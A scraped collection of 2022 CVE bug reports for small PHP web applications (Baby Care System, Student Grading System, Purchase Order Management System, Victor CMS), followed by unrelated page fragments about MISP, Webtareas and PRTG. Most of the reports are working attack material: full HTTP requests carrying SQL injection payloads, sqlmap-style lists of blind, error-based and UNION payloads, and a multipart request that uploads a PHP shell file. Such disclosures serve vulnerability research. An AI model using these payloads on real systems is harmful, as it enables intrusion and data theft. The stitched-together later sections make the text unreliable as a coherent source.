Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via /admin/pagerole.php&action=display&value=1&roleid=.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/pagerole.php&action=display&value=1&roleid=

Vulnerability location: /BabyCare/admin.php?id=pagerole&action=display&value=1&roleid= //postid is Injection point

\[+\]Payload: /BabyCare/admin.php?id=pagerole&action=display&value=1&roleid=3%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)--+ //roleid is Injection point

GET /BabyCare/admin.php?id\=pagerole&action\=display&value\=1&roleid\=3%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)\--\+ HTTP/1.1
Host: 192.168.1.19
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=v8g2iaa0tsnt5b01btt83eb7qo
Connection: close

\--\-
Parameter: roleid (GET)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=pagerole&action\=display&value\=1&roleid\=3' RLIKE (SELECT (CASE WHEN (6967=6967) THEN 3 ELSE 0x28 END))-- nhxC
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=pagerole&action=display&value=1&roleid=3' AND (SELECT 2190 FROM(SELECT COUNT(\*),CONCAT(0x7162627871,(SELECT (ELT(2190\=2190,1))),0x717a766b71,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a)\-- Gllb

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=pagerole&action\=display&value\=1&roleid\=3' AND (SELECT 4825 FROM (SELECT(SLEEP(5)))FSej)-- xCer
\---

CVE-2022-28425: bug_report/SQLi-6.md at main · k0xx11/bug_report

Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via /admin/posts.php&action=delete.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/posts.php&action=delete

Vulnerability location: /BabyCare/admin.php?id=posts&action=delete&postid=7&image= //postid is Injection point

\[+\]Payload: /BabyCare/admin.php?id=posts&action=delete&postid=7%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)--+&image= //postid is Injection point

GET /BabyCare/admin.php?id\=posts&action\=delete&postid\=7%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)\--+&image= HTTP/1.1
Host: 192.168.1.19
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=v8g2iaa0tsnt5b01btt83eb7qo
Connection: close

\--\-
Parameter: postid (GET)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=posts&action\=delete&postid\=7' RLIKE (SELECT (CASE WHEN (3209=3209) THEN 7 ELSE 0x28 END))-- pges&image=
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: id=posts&action=delete&postid=7' AND EXTRACTVALUE(7032,CONCAT(0x5c,0x7170767071,(SELECT (ELT(7032\=7032,1))),0x7171787171))\-- OvNm&image=

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=posts&action\=delete&postid\=7' AND (SELECT 3278 FROM (SELECT(SLEEP(5)))KhCO)-- EGcS&image=
\--

CVE-2022-28423: bug_report/SQLi-4.md at main · k0xx11/bug_report

Baby Care System v1.0 was discovered to contain a SQL injection vulnerability via /admin/posts.php&find=.

**Body Care System has SQL injection vulnerability**

vendor: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html

Vulnerability file: /BabyCare/admin/posts.php&find=

Vulnerability location: /BabyCare/admin.php?id=posts&find= //find is Injection point

\[+\]Payload: /BabyCare/admin.php?id=posts&find=3%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)--+ //find is Injection point

GET /BabyCare/admin.php?id\=posts&find\=3%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),2)\--\+ HTTP/1.1
Host: 192.168.1.19
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=v8g2iaa0tsnt5b01btt83eb7qo
Connection: close

\--\-
Parameter: find (GET)
    Type: boolean\-based blind
    Title: MySQL RLIKE boolean\-based blind \- WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id\=posts&find\=3' RLIKE (SELECT (CASE WHEN (6593=6593) THEN 3 ELSE 0x28 END))-- zXvu
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=posts&find=3' AND (SELECT 3959 FROM(SELECT COUNT(\*),CONCAT(0x7170787071,(SELECT (ELT(3959\=3959,1))),0x7178787171,FLOOR(RAND(0)\*2))x FROM INFORMATION\_SCHEMA.PLUGINS GROUP BY x)a)\-- IVWt

    Type: time\-based blind
    Title: MySQL \>= 5.0.12 AND time\-based blind (query SLEEP)
    Payload: id\=posts&find\=3' AND (SELECT 4643 FROM (SELECT(SLEEP(5)))bafh)-- GSoV
    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: id=posts&find=3' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170787071,0x65476d614a4d4d69526c636a4e486f436b45485a67484d67736e4e47657a654761684c644d734557,0x7178787171),NULL#
\--\-

CVE-2022-28424: bug_report/SQLi-5.md at main · k0xx11/bug_report

Student Grading System v1.0 was discovered to contain a SQL injection vulnerability via /student-grading-system/rms.php?page=school_year.

Permalink

Cannot retrieve contributors at this time

**Student-grading-system v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/14522/student-grading-system-using-phpmysql-source-code.html

Vulnerability File: /student-grading-system/rms.php?page=school\_year

Vulnerability location: /student-grading-system/rms.php?page=school\_year,sy

\[+\] Pyaload: id=4&sy=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+&status=%E4%B8%8D

POST /student\-grading\-system/rms.php?page\=school\_year HTTP/1.1
Host: 192.168.1.19
Content\-Length: 71
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
Origin: http://192.168.1.19
Content\-Type: application/x\-www\-form\-urlencoded
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.19/student-grading-system/rms.php?page=school\_year
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=lpvr00hu9v7v4dvs4atvc5gdg6
Connection: close
id=4&sy=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+&status=%E4%B8%8D

CVE-2022-28025: bug_report/SQLi-2.md at main · k0xx11/bug_report

Student Grading System v1.0 was discovered to contain a SQL injection vulnerability via /student-grading-system/rms.php?page=grade.

**Student-grading-system v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/14522/student-grading-system-using-phpmysql-source-code.html

Vulnerability File: /student-grading-system/rms.php?page=grade

Vulnerability location: /student-grading-system/rms.php?page=grade,id

\[+\] Pyaload: id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+&grade=1' and updatexml(1,concat(0x7e,(select version()),0x7e),0)--+

POST /student\-grading\-system/rms.php?page\=grade HTTP/1.1
Host: 192.168.1.19
Content\-Length: 133
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
Origin: http://192.168.1.19
Content\-Type: application/x\-www\-form\-urlencoded
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.19/student-grading-system/rms.php?page=grade
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=lpvr00hu9v7v4dvs4atvc5gdg6
Connection: close
id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+&grade=1' and updatexml(1,concat(0x7e,(select version()),0x7e),0)--+

CVE-2022-28024: bug_report/SQLi-1.md at main · k0xx11/bug_report

Student Grading System v1.0 was discovered to contain a SQL injection vulnerability via /student-grading-system/rms.php?page=student_p&id=.

**Student-grading-system v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/14522/student-grading-system-using-phpmysql-source-code.html

Vulnerability File: /student-grading-system/rms.php?page=student\_p&id=

Vulnerability location: /student-grading-system/rms.php?page=student\_p&id=,id

\[+\] Pyaload: id=1%27%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,database(),11,12,13,14,15,16,CONCAT(0x716a767a71,0x4363574d72716c57514d6f6e626241676a5469757266544a466d704755435841746863464d445244,0x716a787a71),18,19--+-

GET /student\-grading\-system/rms.php?page\=student\_p&id\=1%27%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,database(),11,12,13,14,15,16,CONCAT(0x716a767a71,0x4363574d72716c57514d6f6e626241676a5469757266544a466d704755435841746863464d445244,0x716a787a71),18,19\--+- HTTP/1.1
Host: 192.168.1.19
Cache\-Control: max\-age\=0
Upgrade\-Insecure\-Requests: 1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=j0d3j11j73v4lm3m8d74g5d3gu
Connection: close

CVE-2022-28026: bug_report/SQLi-3.md at main · k0xx11/bug_report

Purchase Order Management System v1.0 was discovered to contain a remote code execution (RCE) vulnerability via /purchase_order/admin/?page=user.

Permalink

Cannot retrieve contributors at this time

**Purchase-order-management-system v1.0 by oretnom23 has arbitrary code execution (RCE)**

vendors: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html

Vulnerability url: http://ip/purchase\_order/admin/?page=user

Request package for file upload：

POST /purchase\_order/classes/Users.php?f\=save HTTP/1.1
Host: 192.168.1.19
Content\-Length: 799
Accept: \*/\*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarylz8EuWf30x9QqTzc
Origin: http://192.168.1.19
Referer: http://192.168.1.19/purchase\_order/admin/?page=user/manage\_user&id=3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=sils4jibq9sp4e2n7i4joq8to7
Connection: close
\------WebKitFormBoundarylz8EuWf30x9QqTzc
Content-Disposition: form-data; name="id"
3
\------WebKitFormBoundarylz8EuWf30x9QqTzc
Content-Disposition: form-data; name="firstname"
Mike 
\------WebKitFormBoundarylz8EuWf30x9QqTzc
Content-Disposition: form-data; name="lastname"
Williams
\------WebKitFormBoundarylz8EuWf30x9QqTzc
Content-Disposition: form-data; name="username"
mwilliams
\------WebKitFormBoundarylz8EuWf30x9QqTzc
Content-Disposition: form-data; name="password"
\------WebKitFormBoundarylz8EuWf30x9QqTzc
Content-Disposition: form-data; name="type"
2
\------WebKitFormBoundarylz8EuWf30x9QqTzc
Content-Disposition: form-data; name="img"; filename="shell.php"
Content-Type: application/octet-stream
<?php phpinfo();?>
\------WebKitFormBoundarylz8EuWf30x9QqTzc--

The file will be uploaded to the uploads directory

We visit the url of the shell.php file and find that the code has been executed

Url: http://ip/purchase\_order/uploads/1648212480\_shell.php

CVE-2022-28021: bug_report/RCE-1.md at main · k0xx11/bug_report

Victor v1.0 was discovered to contain a remote code execution (RCE) vulnerability via the component admin/profile.php?section=admin.

**Victor 1.0 admin/profile.php?section=admin Arbitrary code execution vulnerability exists**

Supplier: https://github.com/VictorAlagwu/CMSsite

Version: Victor 1.0

Vulnerability Details：

An arbitrary code execution vulnerability exists in the user image of Victor/admin/profile.php?section=admin in Victor 1.0

payload: The content of shell.php is code below

First, we click Register to register an account,

Then enter our just registered account number and password in Login

After logging in, click on the last Profile on the left to visit his page

Then go to User Image and click to select the file, upload the shell.php file

Scroll to the end, click Update User, the file will be successfully uploaded to the "{ip}:/Victor/img" directory

Access the "{ip}:/Victor/img" directory and find that the file exists

We access shell.php in the img directory from the browser and find that the code has been executed

CVE-2022-27478: Vulscve/Victor1.0-rce.md at master · k0xx11/Vulscve

An issue was discovered in MISP before 2.4.158. In UsersController.php, password confirmation can be bypassed via vectors involving an "Accept: application/json" header.

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2022-29534: Comparing v2.4.157...v2.4.158 · MISP/MISP

An SQL Injection vulnerability exists in Webtareas 2.4p3 and earlier via the $uq HTTP POST parameter in editapprovalstage.php.

\-Project Management  
\-Bug Tracking  
\-Forum  
\-Content Management  
\-Timesheet-Meeting Arrangement  
\-Simple Form Design  
\-Client Collaboration  
\-Simple Approval Procedure  
\-Contact Management  
\-Invoices & Payments  
\-Instant Messaging  
\-Online Meeting

**Features**

*   Project Management
*   Time Tracking
*   Timesheet with FlexTime functionality
*   Content Management
*   Custom Reports
*   Approval Procedure
*   Calendars
*   Custom Relationship Management
*   Custom Form Templates
*   Meeting Invitation
*   Invoices & Payments
*   Instant Messaging
*   Online Meeting
*   Extension Management
*   Forum
*   File Sharing

**License**GNU General Public License version 2.0 (GPLv2)

PRTG Network Monitor is an all-inclusive monitoring software solution developed by Paessler. Equipped with an easy-to-use, intuitive interface with a cutting-edge monitoring engine, PRTG Network Monitor optimizes connections and workloads as well as reduces operational costs by avoiding outages while saving time and controlling service level agreements (SLAs). The solution is packed with specialized monitoring features that include flexible alerting, cluster failover solution, distributed monitoring, in-depth reporting, maps and dashboards, and more.

**User Ratings**

5.0 out of 5 stars

★★★★★

★★★★

★★★

★★

★

ease 1 of 5 2 of 5 3 of 5 4 of 5 5 of 5 4 / 5

features 1 of 5 2 of 5 3 of 5 4 of 5 5 of 5 4 / 5

design 1 of 5 2 of 5 3 of 5 4 of 5 5 of 5 4 / 5

support 1 of 5 2 of 5 3 of 5 4 of 5 5 of 5 4 / 5

**User Reviews**

*   All
*   ★★★★★
*   ★★★★
*   ★★★
*   ★★
*   ★

*   WOW, this is amazing, was amazed to find this, I will be doing further testing, but from the initial looks, fantastic software. If all goes well Iwill be pitching this software to our manager.
    
*   HI i just install to my centos server with php5.4 apach2.2up mysql the function works fine~ but i cant show the gantt of project , i dont know how to fix it, would you please give me a hand
    
*   1 user found this review helpful.
    
*   Webtareas works wonderful.
    
    1 user found this review helpful.
    
*   A great enhance from netoffice Dwins! But I feel the old interface style include in package 'netOfficeDwins.1.4p3.zip' is more concise and professional: the theme 'blue' of this new product is similar with default theme of 1.4, but the new theme looks so rough.
    
    1 user found this review helpful.
    

Read more reviews >

**Additional Project Details**

**Languages**Croatian, Thai, Romanian, Korean, French, Ukrainian, Dutch, Polish, Irish Gaelic, Lithuanian, Albanian, Icelandic, Macedonian, Latvian, Czech, Afrikaans, Finnish, Italian, Catalan, Greek, Vietnamese, English, Portuguese, Serbian, Slovak, Chinese (Traditional), Belarusian, Estonian, Bulgarian, Swedish, Turkish, Hindi, Indonesian, Malay, Norwegian, Chinese (Simplified), Danish, German, Japanese, Spanish, Russian, Arabic, Hungarian, Basque (Euskara), Georgian

**Intended Audience**Information Technology, Customer Service, Legal Industry, Developers, Architects, Management

**User Interface**Web-based

**Programming Language**PHP, JavaScript

**Database Environment**MySQL, PostgreSQL (pgsql)

2013-03-07

Tag

#php